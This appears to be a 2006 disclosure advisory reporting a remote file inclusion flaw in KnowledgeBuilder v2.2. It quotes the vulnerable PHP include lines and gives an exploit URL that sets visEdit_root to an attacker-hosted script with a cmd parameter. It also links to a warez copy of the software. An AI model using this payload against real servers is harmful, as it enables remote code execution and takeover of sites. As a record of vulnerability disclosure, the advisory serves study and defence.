Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[SA21883] emuCMS "query" and "page" Cross-Site Scripting Vulnerabilities

phpQuiz v0.01 design and coding byJule Slootbeek (pagename) Remote File Inclusion

Mambo com_serverstat Component <=0.4.4 Remote File Include Vulnerability

Magic News Pro => 1.0.3 (script_path) Remote File Inclusion Exploit

From:	hamidreza_(at)_mineduc.gov.rw <hamidreza_(at)_mineduc.gov.rw>
Date:	14.09.2006
Subject:	KnowledgeBuilder.v2.2.PHP.NULL-WDYL Remote File Inclusion

+--------------------------------------------------------------------
+
+  KnowledgeBuilder.v2.2.PHP.NULL-WDYL  Remote File Inclusion
+
+-------------------------------------------------------------------
+
+ Version ...........: KnowledgeBuilder.v2.2.PHP.NULL-WDYL
+ cms download ......: http://warez.gtasoft.ru/skripts/KnowledgeBuilder.v2.2.PHP.NULL-WDYL.zip
+ Class .............: Remote File Inclusion
+ Found by ..........: igi
+ Contact ...........: hamidreza@mineduc.gov.rw
+
+--------------------------------------------------------------------
+--------------------------------------------------------------------

+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<?php
// ================================================
// Main control class
// ================================================

include $visEdit_root.'config/visEdit_control.config.php';
include $visEdit_root.'class/toolbars.class.php';
include $visEdit_root.'class/lang.class.php';
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

----------------------------------------------------------------------------
------
http://www.victom.com/admin/e_data/visEdit_control.class.php?visEdit_root=http:
//yourevil.com/r0x.dat.txt?cmd
----------------------------------------------------------------------------
--------

# milw0rm.com [2006-09-13]